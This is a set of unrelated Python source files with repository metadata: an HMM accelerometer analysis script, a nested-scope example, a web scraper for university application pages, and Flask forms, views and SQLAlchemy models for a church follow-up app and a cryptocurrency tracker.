    # model.means = means
    # model.covars = covars
    # X, Z = model.sample(100) The observable vs. hidden state probabilities
    # --------------------------------------------------
    # TRAIN MODEL
    """
    List of array-like observation sequences,
    each of which has shape (n_i, n_features), where n_i is the length of the i_th observation.
    """
    # COULD IT BE THAT I HAVE MISUNDERSTOOD THE TRAINING HERE?
    # NOTE(review): `df` is undefined here (its csv loading is commented out
    # at module scope) -- NameError at runtime.
    x = df['accelerometer_x'].values
    y = df['accelerometer_y'].values
    z = df['accelerometer_z'].values
    X = np.column_stack([x, y, z])
    print X
    print X.shape
    thurs_model = Model( name="Punch-Other" )
    # Emission probabilities
    # looks for discrete distribution
    punch = State( DiscreteDistribution({ 'walk': 0.1, 'shop': 0.4, 'clean': 0.5 }) )
    other = State( DiscreteDistribution({ 'walk': 0.6, 'shop': 0.3, 'clean': 0.1 }) )
    ###############################################################################
    # Run Gaussian HMM
    print("fitting to HMM and decoding ...")
    # n_components : Number of states.
    #_covariance_type : string describing the type of covariance parameters to use.
    # Must be one of 'spherical', 'tied', 'diag', 'full'. Defaults to 'diag'.
    model = GaussianHMM(n_components=2, covariance_type="diag").fit(X)
    # predict the optimal sequence of internal hidden state
    # Get the unlabelled data
    # NOTE(review): _z reads accelerometer_y -- looks like a copy/paste slip
    # for accelerometer_z; confirm before relying on the third feature.
    _x = df_unlabelled['accelerometer_x'].values
    _y = df_unlabelled['accelerometer_y'].values
    _z = df_unlabelled['accelerometer_y'].values
    Z = np.column_stack([_x, _y, _z])
    # print Z
    print Z.shape
    hidden_states = model.predict(Z)
    print("done\n")
    ####################################
    print("means and vars of each hidden state")
    for i in range(model.n_components):
        print("%dth hidden state" % i)
        print("mean = ", model.means_[i])
        print("var = ", np.diag(model.covars_[i]))
        print()
    print hidden_states[1:50]
    # 1 = punch
    # 0 = other
#my_hmm()
| {
"repo_name": "ChristopherGS/sensor_readings",
"path": "app/science.py",
"copies": "1",
"size": "5247",
"license": "bsd-3-clause",
"hash": 2338509595643790300,
"line_mean": 25.3668341709,
"line_max": 109,
"alpha_frac": 0.6167333715,
"autogenerated": false,
"ratio": 3.4339005235602094,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9491166748240201,
"avg_score": 0.01189342936400181,
"num_lines": 199
} |
# Application-wide scope holding config shared by every request.
app_scope = scope.Scope()
app_scope['db_password'] = 'foobar'
app_scope['user'] = 'anon'
# Inner scope entered per user session; values set inside it shadow the
# app scope without mutating it (demonstrated in main() below).
nested_user_scope = scope.Scope()
def handle_user():
    """Exercise scope shadowing from inside the nested user session."""
    session = scope.get_current_scope()
    # inside a user session we can store user-specific data...
    session['user'] = 'admin'
    # ...while app-level data remains readable through the scope chain
    assert session.get('db_password') == 'foobar'
    # overriding an app value inside the nested scope...
    session['db_password'] = 'secret_admin_password'
    # ...is visible locally, alongside the user data we set:
    assert session.get('db_password') == 'secret_admin_password'
    assert session.get('user') == 'admin'
def main():
    """Demonstrate that a nested scope cannot corrupt its parent scope."""
    with app_scope():
        # "some app" keeps its db_password inside the outer scope
        assert scope.get('db_password') == 'foobar'
        with nested_user_scope():
            handle_user()
        # leaving the user scope restores the untouched app values
        assert scope.get('db_password') == 'foobar'
        assert scope.get('user') == 'anon'
main() | {
"repo_name": "FlorianLudwig/scope",
"path": "doc/examples/nested.py",
"copies": "1",
"size": "1056",
"license": "apache-2.0",
"hash": -6705785039128514000,
"line_mean": 25.425,
"line_max": 70,
"alpha_frac": 0.6126893939,
"autogenerated": false,
"ratio": 3.6288659793814433,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4741555373281443,
"avg_score": null,
"num_lines": null
} |
# app/scraper.py
import json
import logging
import urllib2
from datetime import datetime
from bs4 import BeautifulSoup
# from ufc.models import Fighter, Opponent
# from models import University, Course
# import processor
UNIVERSITY_URL = 'http://www.york.ac.uk/study/undergraduate/courses/all?level=postgraduate&q='
APPLY_URL = 'https://www.york.ac.uk/admin/uao/ugrad/courses/cupid/index.cfm?ippCode=DRMCOMSSCI1&level=postgraduate'
class Scraper(object):
    """This class handles the pure scraping of the data.

    NOTE(review): Python 2 module (urllib2, print statements).
    """
    def __init__(self, arg):
        # arg is stored but never read by the methods below
        super(Scraper, self).__init__()
        self.arg = arg
        self.base_url = UNIVERSITY_URL
        self.apply_url = APPLY_URL
    def check_db_for_course(self, course_name):
        # NOTE(review): Fighter and fighter_name are not defined anywhere in
        # this module (the ufc.models import above is commented out), so
        # calling this raises NameError.  course_name is also unused.
        if Fighter.objects.filter(fighter_name = fighter_name).exists():
            return True
        else:
            return False
    def get_questions(self, requirement):
        #import pdb; pdb.set_trace()
        # Scrape the <label> texts (application-form questions) for the
        # university named in requirement['uni']; any other value scrapes
        # both hard-coded pages and concatenates the results.
        questions = []
        updated_url = str('https://www.york.ac.uk/admin/uao/ugrad/courses/cupid/index.cfm?ippCode=DRMCOMSSCI1&level=postgraduate')
        print requirement
        if requirement['uni'] == 'york':
            updated_url = ('https://www.york.ac.uk/admin/uao/ugrad/courses/cupid/index.cfm?ippCode=DRMCOMSSCI1&level=postgraduate')
            source = urllib2.urlopen(updated_url).read()
            # NOTE(review): BeautifulSoup() without an explicit parser warns
            # on modern bs4; 'html.parser' is the usual choice.
            soup = BeautifulSoup(source)
            forms = soup.find_all('label')
            for question in forms:
                print question.getText()
                questions.append(question.getText())
            return questions
        elif requirement['uni'] == 'manchester':
            # NOTE(review): branch is named 'manchester' but scrapes the
            # Sheffield application page.
            updated_url = ('https://www.sheffield.ac.uk/postgradapplication/')
            source = urllib2.urlopen(updated_url).read()
            soup = BeautifulSoup(source)
            forms = soup.find_all('label')
            for question in forms:
                print question.getText()
                questions.append(question.getText())
            return questions
        else:
            # fallback: scrape both pages and merge their questions
            updated_url1 = str('https://www.york.ac.uk/admin/uao/ugrad/courses/cupid/index.cfm?ippCode=DRMCOMSSCI1&level=postgraduate')
            updated_url2 = str('https://www.sheffield.ac.uk/postgradapplication/')
            source1 = urllib2.urlopen(updated_url1).read()
            source2 = urllib2.urlopen(updated_url2).read()
            soup1 = BeautifulSoup(source1)
            soup2 = BeautifulSoup(source2)
            forms1 = soup1.find_all('label')
            forms2 = soup2.find_all('label')
            for question in forms1:
                questions.append(question.getText())
            for question in forms2:
                questions.append(question.getText())
            return questions
"repo_name": "ChristopherGS/1_app",
"path": "app/scraper.py",
"copies": "1",
"size": "2772",
"license": "bsd-3-clause",
"hash": 650274953189152600,
"line_mean": 36.9863013699,
"line_max": 135,
"alpha_frac": 0.6219336219,
"autogenerated": false,
"ratio": 3.681274900398406,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4803208522298406,
"avg_score": null,
"num_lines": null
} |
# app/seguimientos/forms.py
# coding: utf-8
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, HiddenField
from wtforms import DateField, SelectField
from wtforms.validators import DataRequired
from wtforms.widgets import TextArea
class SeguimientoForm(FlaskForm):
    """
    Form to create or edit a follow-up ("seguimiento") entry.
    """
    # Hidden id of the member this entry belongs to (filled client-side).
    id_miembro = HiddenField("idDir")
    nomyape = StringField(u'Nombres y Apellidos Miembro:')
    # "Familia model" in the original note -- looks like a stale
    # copy-paste; the fields below belong to Seguimiento. TODO confirm.
    fecha_seg = DateField(u'Fecha de la entrada',
                          validators=[DataRequired()])
    # Contact type, stored as an int code (see choices).
    tipo_seg = SelectField(u'Tipo de Contacto',
                           coerce=int,
                           choices=[(0, 'LLAMADA'),
                                    (1, 'MENSAJE'),
                                    (2, 'PRESENCIAL'),
                                    (3, 'OTRO')])
    comentarios_seg = StringField(u'Comentarios',
                                  widget=TextArea())
    submit = SubmitField(u'Aceptar')
class ConsultaSegForm(FlaskForm):
    """
    Member-lookup form used to query follow-up entries.
    """
    # Hidden id filled by the autocomplete widget.
    id_miembro = HiddenField("idDir")
    nomyape = StringField(u'Nombres y Apellidos de la Persona:')
    submit = SubmitField(u'Buscar')
| {
"repo_name": "originaltebas/chmembers",
"path": "app/seguimientos/forms.py",
"copies": "1",
"size": "1228",
"license": "mit",
"hash": -5576548330953486000,
"line_mean": 28.2380952381,
"line_max": 64,
"alpha_frac": 0.5806188925,
"autogenerated": false,
"ratio": 3.7099697885196377,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47905886810196374,
"avg_score": null,
"num_lines": null
} |
# app/seguimientos/views.py
# coding: utf-8
from flask import flash, jsonify
from flask import redirect, render_template, url_for, request
from flask_login import current_user, login_required
from app.seguimientos import seguimientos
from app.seguimientos.forms import SeguimientoForm, ConsultaSegForm
from app import db
from app.models import Seguimiento, Miembro
def check_edit_or_admin():
    """
    Abort with 403 unless the current user is an editor or admin.
    """
    # Fix: the original returned a redirect(), but every caller invokes
    # this helper without using its return value, so the check never
    # actually blocked anyone.  abort() raises an HTTPException and
    # therefore takes effect regardless of how the helper is called.
    # (The original intent was a redirect to home.hub -- restoring that
    # would require changing every call site.)
    from flask import abort  # local import keeps this fix self-contained
    if current_user.get_urole() < 1:
        abort(403)
def check_only_admin():
    """
    Abort with 403 unless the current user is an admin.
    """
    # Fix: as with check_edit_or_admin, the returned redirect() was
    # discarded by every caller, so non-admins were never blocked.
    # abort() raises, so the guard works however the helper is called.
    from flask import abort  # local import keeps this fix self-contained
    if current_user.get_urole() != 2:
        abort(403)
@seguimientos.route('/seguimientos', methods=['GET'])
@login_required
def ver_seguimientos():
    """List every follow-up entry, newest first (admin only)."""
    check_only_admin()
    # Template switch: show the listing panel.
    flag_listar = True
    extra_cols = (Seguimiento.fecha_seg,
                  Seguimiento.comentarios_seg,
                  Seguimiento.tipo_seg,
                  Seguimiento.id,
                  Seguimiento.id_miembro,
                  Miembro.fullname)
    query_seguimientos = (db.session.query(Seguimiento)
                          .join(Miembro,
                                Seguimiento.id_miembro == Miembro.id)
                          .add_columns(*extra_cols)
                          .order_by(Seguimiento.fecha_seg.desc()))
    return render_template('seguimientos/base_seguimientos.html',
                           seguimientos=query_seguimientos,
                           flag_listar=flag_listar)
@seguimientos.route('/seguimientos/crear', methods=['GET', 'POST'])
@login_required
def crear_seguimiento():
    """Create a new follow-up entry (admin only)."""
    check_only_admin()
    # Template switches: creation form, not the listing.
    flag_listar = False
    flag_crear = True
    form = SeguimientoForm()
    if form.validate_on_submit():
        nuevo = Seguimiento(fecha_seg=form.fecha_seg.data,
                            comentarios_seg=form.comentarios_seg.data,
                            id_miembro=form.id_miembro.data,
                            tipo_seg=form.tipo_seg.data)
        try:
            db.session.add(nuevo)
            db.session.commit()
            flash('Has guardado los datos correctamente', 'success')
        except Exception as e:
            flash('Error:' + str(e), 'danger')
        return redirect(url_for('seguimientos.ver_seguimientos'))
    return render_template(
        'seguimientos/base_seguimientos.html',
        add_seguimiento=flag_crear, flag_listar=flag_listar, form=form)
@seguimientos.route('/seguimientos/modif/<int:id>',
                    methods=['GET', 'POST'])
@login_required
def modif_seguimiento(id):
    """Edit an existing follow-up entry (admin only)."""
    check_only_admin()
    flag_crear = False
    flag_listar = False
    seg = Seguimiento.query.get_or_404(id)
    miembro = Miembro.query.get_or_404(seg.id_miembro)
    form = SeguimientoForm(obj=seg)
    if request.method == 'GET':
        # Pre-populate the form from the stored entry.
        form.fecha_seg.data = seg.fecha_seg
        form.comentarios_seg.data = seg.comentarios_seg
        form.tipo_seg.data = seg.tipo_seg
        form.id_miembro.data = seg.id_miembro
    if request.method == 'POST':
        if form.validate_on_submit():
            # Copy the submitted values back onto the entity and persist.
            seg.fecha_seg = form.fecha_seg.data
            seg.comentarios_seg = form.comentarios_seg.data
            seg.tipo_seg = form.tipo_seg.data
            seg.id_miembro = form.id_miembro.data
            try:
                db.session.commit()
                flash('Has modificado los datos correctamente', 'success')
            except Exception as e:
                flash('Error: ' + str(e), 'danger')
            return redirect(url_for('seguimientos.ver_seguimientos'))
    return render_template(
        'seguimientos/base_seguimientos.html', miembro=miembro,
        add_seguimiento=flag_crear, flag_listar=flag_listar, form=form)
@seguimientos.route('/seguimientos/borrar/<int:id>',
                    methods=['GET'])
@login_required
def borrar_seguimiento(id):
    """Delete one follow-up entry, then return to the listing (admin only)."""
    check_only_admin()
    seg = Seguimiento.query.get_or_404(id)
    try:
        db.session.delete(seg)
        db.session.commit()
        flash('Has borrado los datos correctamente', 'success')
    except Exception as e:
        flash('Error: ' + str(e), 'danger')
    return redirect(url_for('seguimientos.ver_seguimientos'))
@seguimientos.route('/seguimientos/consultas',
                    methods=['GET', 'POST'])
@login_required
def consulta_seguimientos():
    """Query the follow-up history of a single member (admin only)."""
    check_only_admin()
    # Template switch: show the query panel.
    flag_consultar = True
    form = ConsultaSegForm()
    if form.validate_on_submit():
        extra_cols = (Seguimiento.fecha_seg,
                      Seguimiento.comentarios_seg,
                      Seguimiento.tipo_seg,
                      Seguimiento.id,
                      Seguimiento.id_miembro,
                      Miembro.fullname)
        listado_segs = (db.session.query(Seguimiento)
                        .join(Miembro,
                              Seguimiento.id_miembro == Miembro.id)
                        .add_columns(*extra_cols)
                        .order_by(Seguimiento.fecha_seg.desc())
                        .filter(Seguimiento.id_miembro ==
                                form.id_miembro.data)
                        .all())
        return render_template(
            'seguimientos/base_seguimientos.html',
            flag_consultar=flag_consultar, form=form,
            seguimientos=listado_segs, flag_seguimientos=True)
    return render_template(
        'seguimientos/base_seguimientos.html',
        flag_consultar=flag_consultar, form=form)
def Convert(tup, di):
    """Fill *di* with one id -> name entry per ``(id, name)`` pair in *tup*.

    Mutates *di* in place and also returns it.

    Fix: the original called ``dict.setdefault`` with the FIXED keys
    ``"id"``/``"name"``, so only the first pair ever survived and the
    loop was pointless.  NOTE(review): downstream ``autocomplete``
    jsonifies this dict; confirm the front-end expects an id->name map.
    """
    for ident, name in tup:
        di[ident] = name
    return di
@seguimientos.route('/seguimientos/autocomplete', methods=['GET'])
def autocomplete():
    """Return member matches for the typeahead widget as JSON."""
    search = request.args.get('q')
    pattern = '%' + str(search) + '%'
    matches = Miembro.query.filter(Miembro.fullname.like(pattern)).all()
    results = [(row.id, row.fullname) for row in matches]
    resdic = {}
    Convert(results, resdic)
    # Debug trace kept to preserve the original behaviour.
    print(resdic)
    return jsonify(matching_results=resdic)
| {
"repo_name": "originaltebas/chmembers",
"path": "app/seguimientos/views.py",
"copies": "1",
"size": "7695",
"license": "mit",
"hash": 8449344635153801000,
"line_mean": 32.025751073,
"line_max": 79,
"alpha_frac": 0.5420402859,
"autogenerated": false,
"ratio": 3.4383378016085793,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4480378087508579,
"avg_score": null,
"num_lines": null
} |
# app/server/__init__.py
#################
#### imports ####
#################
import os
from flask import Flask, render_template
from flask_login import LoginManager
from flask_bcrypt import Bcrypt
from flask_debugtoolbar import DebugToolbarExtension
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
################
#### config ####
################
# Application object; templates/static live under the sibling client/ tree.
app = Flask(
    __name__,
    template_folder='../client/templates',
    static_folder='../client/static'
)

# Config class is selected via the APP_SETTINGS env var; defaults to dev.
app_settings = os.getenv('APP_SETTINGS', 'app.server.config.DevelopmentConfig')
app.config.from_object(app_settings)

####################
#### extensions ####
####################

login_manager = LoginManager()
login_manager.init_app(app)
bcrypt = Bcrypt(app)
toolbar = DebugToolbarExtension(app)
bootstrap = Bootstrap(app)
db = SQLAlchemy(app)

###################
### blueprints ####
###################

# Imported here (not at the top) because the view modules import
# `app`/`db` from this package -- avoids a circular import.
from app.server.user.views import user_blueprint
from app.server.main.views import main_blueprint

app.register_blueprint(user_blueprint)
app.register_blueprint(main_blueprint)

###################
### flask-login ####
###################

from app.server.models import User

# Unauthenticated users are sent to the login view with a flashed message.
login_manager.login_view = "user.login"
login_manager.login_message_category = 'danger'
@login_manager.user_loader
def load_user(user_id):
    """Resolve the id stored in the session back to a User row (or None)."""
    uid = int(user_id)
    return User.query.filter(User.id == uid).first()
########################
#### error handlers ####
########################
@app.errorhandler(401)
def unauthorized_page(error):
    """Render the custom 401 (unauthorized) page."""
    body = render_template("errors/401.html")
    return body, 401
@app.errorhandler(403)
def forbidden_page(error):
    """Render the custom 403 (forbidden) page."""
    body = render_template("errors/403.html")
    return body, 403
@app.errorhandler(404)
def page_not_found(error):
    """Render the custom 404 (not found) page."""
    body = render_template("errors/404.html")
    return body, 404
@app.errorhandler(500)
def server_error_page(error):
    """Render the custom 500 (internal error) page."""
    body = render_template("errors/500.html")
    return body, 500
| {
"repo_name": "samuelhwilliams/cryptracker-web",
"path": "app/server/__init__.py",
"copies": "1",
"size": "1883",
"license": "mit",
"hash": -7563355987272359000,
"line_mean": 19.6923076923,
"line_max": 79,
"alpha_frac": 0.6383430696,
"autogenerated": false,
"ratio": 3.684931506849315,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.980299958000385,
"avg_score": 0.004054999289092926,
"num_lines": 91
} |
# app/server/models.py
import enum
import datetime
from sqlalchemy import UniqueConstraint
from app.server import app, db, bcrypt
class User(db.Model):
    """Application account, authenticated via a bcrypt-hashed password."""
    __tablename__ = "users"

    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    email = db.Column(db.String(255), unique=True, index=True, nullable=False)
    # bcrypt hash, never the plaintext password.
    password = db.Column(db.String(255), nullable=False)
    registered_on = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
    admin = db.Column(db.Boolean, nullable=False, default=False)

    accounts = db.relationship('Account', backref='user', lazy='dynamic')

    def __init__(self, email, password, admin=False):
        self.email = email
        self.password = bcrypt.generate_password_hash(
            password, app.config.get('BCRYPT_LOG_ROUNDS')
        ).decode('utf-8')
        # Fix: use utcnow() to match the column default and the other
        # models (Account/Transaction); now() stored naive *local* time.
        self.registered_on = datetime.datetime.utcnow()
        self.admin = admin

    # NOTE(review): Flask-Login >= 0.3 expects is_authenticated/is_active/
    # is_anonymous to be *properties*; as plain methods the bound-method
    # object is always truthy (so is_anonymous reads as True). Kept as
    # methods to preserve the existing call style -- confirm the
    # flask-login version in use.
    def is_authenticated(self):
        return True

    def is_active(self):
        return True

    def is_anonymous(self):
        return False

    def get_id(self):
        # Fix: Flask-Login specifies get_id() must return a unicode
        # string; load_user() converts it back with int().
        return str(self.id)

    def __repr__(self):
        return '<User {0}>'.format(self.email)
class CurrencyCategory(enum.Enum):
    """Broad class of a currency: government-issued or cryptographic."""
    # auto() numbers members from 1, matching the original explicit values.
    Fiat = enum.auto()
    Crypto = enum.auto()
class Currency(db.Model):
    """A fiat or crypto currency that accounts can be denominated in."""
    __tablename__ = "currencies"

    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    # Fiat vs Crypto; indexed for per-category lookups.
    category = db.Column(db.Enum(CurrencyCategory), nullable=False, index=True)
    # Short ticker code, at most 5 characters.
    code = db.Column(db.String(5), nullable=False, index=True)
    name = db.Column(db.String(256), nullable=False)

    def __init__(self, category, code, name):
        self.category = category
        self.code = code
        self.name = name
class Account(db.Model):
    """A user's holding in a single currency."""
    __tablename__ = "accounts"

    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False, index=True)
    currency_id = db.Column(db.Integer, db.ForeignKey('currencies.id'), nullable=False, index=True)
    # Marks the user's primary account within a currency category.
    primary_account = db.Column(db.Boolean, nullable=False, default=False)
    created_on = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)

    # NOTE(review): Transaction's only FK points at users.id, not
    # accounts.id, so this relationship (and its 'user' backref name)
    # looks misconfigured -- SQLAlchemy has no join path from Account to
    # Transaction. Confirm whether it should live on User instead.
    transactions = db.relationship('Transaction', backref='user', lazy='dynamic')
    # Eagerly joined so account.currency is available without extra queries.
    currency = db.relationship('Currency', backref='accounts', lazy='joined')

    def __init__(self, user_id, currency_id, primary_account=False):
        self.user_id = user_id
        self.currency_id = currency_id
        self.primary_account = primary_account
        self.created_on = datetime.datetime.utcnow()
class Transaction(db.Model):
    """A single exchange of one currency for another by a user."""
    __tablename__ = "transactions"

    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False, index=True)
    # NOTE(review): this attribute shadows the `datetime` module inside the
    # class body.  The default still resolves correctly because the
    # right-hand side is evaluated before the name is bound, and methods
    # resolve `datetime` to the module (class attributes are not in
    # method scope) -- but it is fragile.
    datetime = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
    # presumably the monetary value of the trade at transaction time -- TODO confirm
    value = db.Column(db.Float, nullable=False)
    from_currency = db.Column(db.Integer, db.ForeignKey('currencies.id'), nullable=False, index=True)
    from_volume = db.Column(db.Float, nullable=False)
    from_wallet = db.Column(db.String(256), nullable=False, default='')
    to_currency = db.Column(db.Integer, db.ForeignKey('currencies.id'), nullable=False, index=True)
    to_volume = db.Column(db.Float, nullable=False)
    to_wallet = db.Column(db.String(256), nullable=False, default='')
    # semantics of `stake` (fee? margin?) not visible here -- TODO confirm
    stake = db.Column(db.Float, nullable=False)
    broker = db.Column(db.String(256), nullable=False, default='')
    tx_id = db.Column(db.String(256), nullable=False, default='')
    notes = db.Column(db.String(256), nullable=False, default='')

    def __init__(self, user_id, value, from_currency, from_volume, to_currency, to_volume,
                 stake=0, from_wallet='', to_wallet='', broker='', tx_id='', notes='', trans_datetime=None):
        self.user_id = user_id
        # Falls back to "now" (UTC) when no explicit timestamp is given.
        self.datetime = trans_datetime or datetime.datetime.utcnow()
        self.value = value
        self.from_currency = from_currency
        self.from_volume = from_volume
        self.to_currency = to_currency
        self.to_volume = to_volume
        self.stake = stake
        self.from_wallet = from_wallet
        self.to_wallet = to_wallet
        self.broker = broker
        self.tx_id = tx_id
        self.notes = notes
| {
"repo_name": "samuelhwilliams/cryptracker-web",
"path": "app/server/models.py",
"copies": "1",
"size": "4335",
"license": "mit",
"hash": 7975792705621883000,
"line_mean": 33.9596774194,
"line_max": 108,
"alpha_frac": 0.6620530565,
"autogenerated": false,
"ratio": 3.5737840065952184,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47358370630952185,
"avg_score": null,
"num_lines": null
} |
# app/server/user/forms.py
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, DateTimeField, DecimalField, SelectField
from wtforms.ext.sqlalchemy.fields import QuerySelectField
from wtforms.validators import DataRequired, Email, Length, EqualTo, Optional
from ..models import CurrencyCategory, Currency, Account
class LoginForm(FlaskForm):
    """Email/password sign-in form."""
    email = StringField('Email Address', [DataRequired(), Email()])
    password = PasswordField('Password', [DataRequired()])
class RegisterForm(FlaskForm):
    """Sign-up form: email plus password entered twice."""
    email = StringField(
        'Email Address',
        validators=[
            DataRequired(),
            Email(message=None),
            Length(min=6, max=40)
        ]
    )
    password = PasswordField(
        'Password',
        validators=[DataRequired(), Length(min=6, max=25)]
    )
    # Must match `password` exactly.
    confirm = PasswordField(
        'Confirm password',
        validators=[
            DataRequired(),
            EqualTo('password', message='Passwords must match.')
        ]
    )
class NewAccountForm(FlaskForm):
    """Pick a currency to open a new account in.

    The dropdown only offers currencies the current user does NOT
    already hold an account in.
    """
    currency_code = QuerySelectField('Currency Code', validators=[DataRequired()],
                                     query_factory=lambda: Currency.query.filter(~Currency.accounts.any(Account.user_id == current_user.id)).all(),
                                     get_label='code')
class NewCurrencyForm(FlaskForm):
    """Form to register a new currency (fiat or crypto)."""
    category = SelectField('Category', validators=[DataRequired()], choices=[(x, x.name) for x in CurrencyCategory])
    code = StringField('Currency Code', validators=[DataRequired()])
    name = StringField('Currency Name', validators=[DataRequired()])
class NewTransactionForm(FlaskForm):
    """Log a currency exchange between two of the user's holdings.

    Both currency dropdowns are populated from the accounts the current
    user already holds (one entry per distinct currency).
    NOTE(review): the selected options are Account rows, not Currency
    rows -- consumers must dereference ``.currency`` / ``.currency_id``.
    """
    datetime = DateTimeField('Date & Time', validators=[Optional()])
    value = DecimalField('Value', validators=[Optional()])
    from_currency = QuerySelectField('Currency (from)', validators=[DataRequired()],
                                     query_factory=lambda: Account.query.filter_by(user_id=current_user.id).join(Account.currency).distinct(Currency.id).all(),
                                     get_label='currency.code'
                                     )
    from_volume = DecimalField('Volume (from)', validators=[DataRequired()])
    from_wallet = StringField('Wallet (from)', validators=[Optional()])
    to_currency = QuerySelectField('Currency (to)', validators=[DataRequired()],
                                   query_factory=lambda: Account.query.filter_by(user_id=current_user.id).join(Account.currency).distinct(Currency.id).all(),
                                   get_label='currency.code'
                                   )
    to_volume = DecimalField('Volume (to)', validators=[DataRequired()])
    to_wallet = StringField('Wallet (to)', validators=[Optional()])
    stake = DecimalField('Stake', validators=[Optional()])
    broker = StringField('Broker', validators=[Optional()])
    tx_id = StringField('TX ID', validators=[Optional()])
    notes = StringField('Notes', validators=[Optional()])
| {
"repo_name": "samuelhwilliams/cryptracker-web",
"path": "app/server/user/forms.py",
"copies": "1",
"size": "3054",
"license": "mit",
"hash": 176408980378696800,
"line_mean": 40.2702702703,
"line_max": 159,
"alpha_frac": 0.6299934512,
"autogenerated": false,
"ratio": 4.627272727272727,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5757266178472727,
"avg_score": null,
"num_lines": null
} |
# app/server/user/views.py
from flask import render_template, Blueprint, url_for, redirect, flash, request, abort
from flask_login import login_user, logout_user, login_required, current_user
from app.server import bcrypt, db
from app.server.models import User, Account, Transaction, Currency
from app.server.user.forms import LoginForm, RegisterForm, NewAccountForm, NewCurrencyForm, NewTransactionForm
user_blueprint = Blueprint('user', __name__,)
@user_blueprint.route('/register', methods=['GET', 'POST'])
def register():
    """Sign up a new user and log them straight in."""
    form = RegisterForm(request.form)
    if not form.validate_on_submit():
        # GET, or invalid submission: (re-)show the form.
        return render_template('user/register.html', form=form)
    new_user = User(
        email=form.email.data,
        password=form.password.data
    )
    db.session.add(new_user)
    db.session.commit()
    login_user(new_user)
    flash('Thank you for registering.', 'success')
    return redirect(url_for("user.accounts"))
@user_blueprint.route('/login', methods=['GET', 'POST'])
def login():
    """Authenticate a user; on success redirect to their accounts page."""
    form = LoginForm(request.form)
    if form.validate_on_submit():
        user = User.query.filter_by(email=form.email.data).first()
        if user and bcrypt.check_password_hash(
                user.password, request.form['password']):
            login_user(user)
            flash('You are logged in. Welcome!', 'success')
            return redirect(url_for('user.accounts'))
        flash('Invalid email and/or password.', 'danger')
    # Fix: the original had a second render_template() call on the
    # failed-login path that omitted the page title; all non-success
    # paths now share this single, consistent render.
    return render_template('user/login.html', title='Please Login', form=form)
@user_blueprint.route('/logout')
@login_required
def logout():
    """End the current session and bounce back to the public home page."""
    logout_user()
    flash('You were logged out. Bye!', 'success')
    return redirect(url_for('main.home'))
@user_blueprint.route('/accounts', methods=['GET', 'POST'])
@login_required
def accounts():
    """List the user's accounts; on POST, open a new one.

    The first account a user opens in a currency category (fiat/crypto)
    is marked as their primary account for that category.
    """
    form = NewAccountForm(request.form)
    if request.method == 'POST':
        if form.validate_on_submit():
            currency = Currency.query.filter_by(id=form.currency_code.data.id).first()
            if currency is None:
                abort(400)
            account = Account(user_id=current_user.id, currency_id=currency.id)
            # Fix: restrict the "already has an account in this category"
            # check to the CURRENT user; the original query scanned every
            # user's accounts, so once anyone held a category no new
            # user's first account was ever marked primary.
            other_account_in_category = (Account.query
                                         .filter_by(user_id=current_user.id)
                                         .join(Account.currency)
                                         .filter(Currency.category == currency.category)
                                         .first())
            if other_account_in_category is None:
                account.primary_account = True
            db.session.add(account)
            db.session.commit()
            flash('New account for {} ({}) has been created.'.format(currency.code, currency.name), 'success')
        else:
            flash(form.errors, 'danger')
    return render_template('user/accounts.html',
                           form=form,
                           accounts=Account.query.filter_by(user_id=current_user.id).all())
@user_blueprint.route('/currencies')
@login_required
def currencies():
    """Show every known currency plus the new-currency form."""
    all_currencies = Currency.query.all()
    form = NewCurrencyForm(request.form)
    return render_template('user/currencies.html',
                           form=form,
                           currencies=all_currencies)
@user_blueprint.route('/transactions', methods=['GET', 'POST'])
@login_required
def transactions():
    """List the user's transactions; on POST, log a new one."""
    form = NewTransactionForm(request.form)
    if request.method == 'POST':
        if form.validate_on_submit():
            # Fix: the original hard-coded value=100.00 / stake=0.00 and
            # silently ignored every optional form field.
            value = form.value.data if form.value.data is not None else 0.00
            stake = form.stake.data if form.stake.data is not None else 0.00
            # Fix: the QuerySelectFields yield Account rows, but the
            # Transaction columns are currency foreign keys -- store the
            # account's currency_id, not the Account object itself.
            transaction = Transaction(user_id=current_user.id, value=value,
                                      from_currency=form.from_currency.data.currency_id,
                                      from_volume=form.from_volume.data,
                                      to_currency=form.to_currency.data.currency_id,
                                      to_volume=form.to_volume.data, stake=stake,
                                      from_wallet=form.from_wallet.data or '',
                                      to_wallet=form.to_wallet.data or '',
                                      broker=form.broker.data or '',
                                      tx_id=form.tx_id.data or '',
                                      notes=form.notes.data or '',
                                      trans_datetime=form.datetime.data)
            db.session.add(transaction)
            db.session.commit()
            flash('New transaction has been logged.', 'success')
        else:
            flash(form.errors, 'danger')
    user_transactions = Transaction.query.filter_by(user_id=current_user.id)
    return render_template('user/transactions.html',
                           form=form,
                           transactions=user_transactions)
| {
"repo_name": "samuelhwilliams/cryptracker-web",
"path": "app/server/user/views.py",
"copies": "1",
"size": "4239",
"license": "mit",
"hash": 4774044470634473000,
"line_mean": 35.2307692308,
"line_max": 131,
"alpha_frac": 0.6109931588,
"autogenerated": false,
"ratio": 4.018009478672986,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0007379087984618552,
"num_lines": 117
} |
# AppSettings class - holds app settings for whatever app you desire.
#
# by Eron Hennessey
#
